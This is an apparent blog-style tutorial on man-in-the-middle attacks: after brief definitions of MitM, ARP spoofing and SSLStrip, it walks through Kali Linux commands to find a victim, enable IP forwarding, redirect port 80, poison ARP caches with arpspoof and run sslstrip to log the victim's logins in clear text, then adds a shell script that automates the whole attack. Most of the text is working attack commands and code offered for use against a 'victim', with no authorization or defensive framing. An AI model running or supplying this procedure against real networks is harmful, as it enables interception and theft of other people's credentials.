What is a MitM Attack?
Source: http://www.veracode.com/security/man-middle-attack
A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A man-in-the-middle attack allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. Man-in-the-middle attacks can be abbreviated in many ways, including MITM, MitM, MiM or MIM.
What is Arpspoof?
Source: http://www.veracode.com/security/arp-spoofing
ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network. Once the attacker's MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address. ARP spoofing can enable malicious parties to intercept, modify or even stop data in transit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol.
What is SSLStrip?
Source: http://www.thoughtcrime.org/software/sslstrip/
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
Lab and Requirements:
Kali Linux (any architecture), running as root (every command below needs it)
Be on the same local network as the victim (ARP does not cross a router, so neither does this attack)
> Gather some basic information
Firstly, we'll need to know our target's IP and the router's IP. To get the gateway's IP, type:
route -n
The gateway's address is in the Gateway column of the line whose Destination is 0.0.0.0 (Flags UG).
Mine is 192.168.1.1. Now let's find our victim's IP by typing (this will also try to fingerprint their OS, which is why it needs root):
nmap -O <gateway IP>/24
When the scan finishes it will look like a mess at first, but just look under each line that says "Nmap scan report for <IP>" and select your target. You can also arpspoof the entire network (by leaving out the target), but this may take the network down if there are too many active users, because every host's traffic then has to pass through your machine.
You can also use netdiscover, which only sends ARP requests and is quicker and quieter than nmap -O. Its -r option takes a range, not a single address:
netdiscover -i <interface, usually eth0> -r <the gateway's subnet, e.g. 192.168.1.0/24>
> Now that you have the target's and the router's IP addresses, we can begin arpspoofing, but first we need to enable IP forwarding and add an iptables rule
Firstly, enable IP forwarding. Once the ARP caches are poisoned, every packet between the victim and the router passes through your machine; if the kernel does not forward it, the victim simply loses connectivity and you have launched a DoS instead of a MitM:
echo 1 > /proc/sys/net/ipv4/ip_forward
To check that it worked, read the file back: it should contain 1. The setting does not survive a reboot, so repeat it each time.
Now set up iptables. This rule redirects the victim's forwarded port 80 (plain HTTP) traffic to port 8080, where sslstrip will listen. Port 443 is deliberately left alone: sslstrip never touches TLS, its trick is to keep the victim on plain HTTP:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
> Arpspoof
If you're hard wired, like me, you'll use your Ethernet interface, which for me is eth0. You can check this by:
ifconfig
If you have a wireless network adapter, it will be wlan0, wlan1, etc.
When you've figured out which interface to use, we'll begin arpspoofing. I'll be arpspoofing the entire network, but you'll most likely just be arpspoofing one target. The syntax is arpspoof -i <interface> -t <target> <host>: it tells <target> that <host>'s IP address lives at your MAC address, so it is <target>'s ARP cache that gets poisoned. First, poison the router so that traffic destined for the victim comes to you:
arpspoof -i <interface> -t <router IP> <victim IP>
Then, in a second terminal, reverse the situation so that the victim sends its traffic for the router to you:
arpspoof -i <interface> -t <victim IP> <router IP>
Both terminals should print, roughly once a second, a line of the form <your MAC> <target MAC> 0806 42: arp reply <host IP> is-at <your MAC>; that is the forged reply being re-sent so the cache entry never expires. Leave both running. When you stop them with Ctrl-C, arpspoof sends a final reply carrying the real MAC address so the two hosts recover; if you kill it any other way, the victim may stay cut off until its ARP cache times out.
> Begin SSLStripping and other tools
To begin sslstripping and logging user details, type (-l is the port the iptables rule redirects to, -k kills existing sessions so the victim has to log in again, -w is the log file):
sslstrip -k -l 8080 -w /root/Desktop/log.log
We'll also want to tail it so we don't have to manually check the output every time:
tail -F /root/Desktop/log.log
Now, whenever the victim's browser makes a plain HTTP request (for example, typing a hostname without https://, or following an http:// link) to a site that does not enforce HSTS, sslstrip fetches the page over HTTPS itself, rewrites the https:// links and redirects in the response to http://, and serves the victim the plaintext version. The victim's side of the session is then ordinary HTTP, so anything they submit, such as a login form, is logged in clear text. Note the limits: nothing is "decrypted"; the victim is simply never upgraded to TLS. If the site sends a Strict-Transport-Security header the browser already knows (or is on the HSTS preload list), or the user goes straight to an https:// URL, the browser refuses the downgrade and the attack fails, and in current browsers that covers most major sites.
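The whole procedure above (find the gateway, enable forwarding, add the redirect, run both arpspoofs, start sslstrip) as one script. This is an added example, not part of the original post: it checks its inputs, and, unlike the manual steps, it records what it changed and undoes it on exit so the victim is not left without a gateway when you stop. It assumes Kali's arpspoof (from dsniff), sslstrip and iptables are on PATH, that you run it as root, and that the LAN is a /24 like the post's 192.168.1.0/24; the function names and the "run" argument are my own, and the default log path is the post's.

```shell
#!/bin/sh
# Added example (not from the original post): the manual steps wrapped in one script
# that validates its inputs, records what it changed, and undoes it on exit.
# Assumptions: arpspoof (dsniff), sslstrip and iptables on PATH, running as root,
# and a /24 LAN like the post's. Function names are mine, not from any tool.
set -eu

# Pull the default gateway out of `route -n` output (read from stdin): the row whose
# Destination is 0.0.0.0 and whose Flags contain G.
gateway_from_route() {
    awk '$1 == "0.0.0.0" && $4 ~ /G/ { print $2; exit }'
}

# Turn a gateway address into the /24 that nmap and netdiscover -r expect.
subnet_of() {
    printf '%s.0/24\n' "${1%.*}"
}

# Reject anything that is not a dotted quad with octets 0-255 before it reaches
# arpspoof, which would otherwise fail (or broadcast to everyone) in confusing ways.
is_ipv4() {
    case "$1" in
        *[!0-9.]* | .* | *. | *..* | '') return 1 ;;
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# The two forged-reply streams the post runs in two terminals: poison the router's
# cache about the victim, and the victim's cache about the router.
arpspoof_commands() {
    printf 'arpspoof -i %s -t %s %s\n' "$1" "$2" "$3"   # router learns victim -> our MAC
    printf 'arpspoof -i %s -t %s %s\n' "$1" "$3" "$2"   # victim learns router -> our MAC
}

# Run the attack: forwarding on, port-80 redirect, both arpspoofs in the background,
# sslstrip in the foreground. However we leave, cleanup restores the prior state.
start_mitm() {
    iface="$1"; gw="$2"; victim="$3"; log="${4:-/root/Desktop/log.log}"
    is_ipv4 "$gw" && is_ipv4 "$victim" || { echo "bad gateway/victim IP" >&2; return 2; }
    [ "$(id -u)" -eq 0 ] || { echo "must run as root" >&2; return 2; }

    orig_fwd=$(cat /proc/sys/net/ipv4/ip_forward)
    cleanup() {
        trap - EXIT INT TERM
        # SIGTERM makes arpspoof re-send the real MACs, so the hosts recover quickly.
        kill "${pid1-}" "${pid2-}" 2>/dev/null || true
        iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 2>/dev/null || true
        echo "$orig_fwd" > /proc/sys/net/ipv4/ip_forward
    }
    trap cleanup EXIT INT TERM

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
    arpspoof -i "$iface" -t "$gw" "$victim" >/dev/null 2>&1 & pid1=$!
    arpspoof -i "$iface" -t "$victim" "$gw" >/dev/null 2>&1 & pid2=$!
    sslstrip -k -l 8080 -w "$log"
}

# Usage: sh mitm.sh run <iface> <gateway IP> <victim IP> [logfile]
# Without "run" the script only defines the functions above.
if [ "${1-}" = "run" ]; then
    shift
    start_mitm "$@"
fi
```

Typical use is route -n | gateway_from_route to get the gateway, subnet_of on that for the nmap or netdiscover sweep, then sh mitm.sh run eth0 192.168.1.1 <victim IP>. The trap is the point of the script: the post's two-terminal version works, but if a terminal dies or you kill arpspoof with SIGKILL, the victim's ARP cache still points at your MAC and forwarding is still on, which is a DoS you did not intend and evidence you left behind.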
For other tools, like urlsnarf etc., Google it! This wasn't a research paper, just something I put together quickly.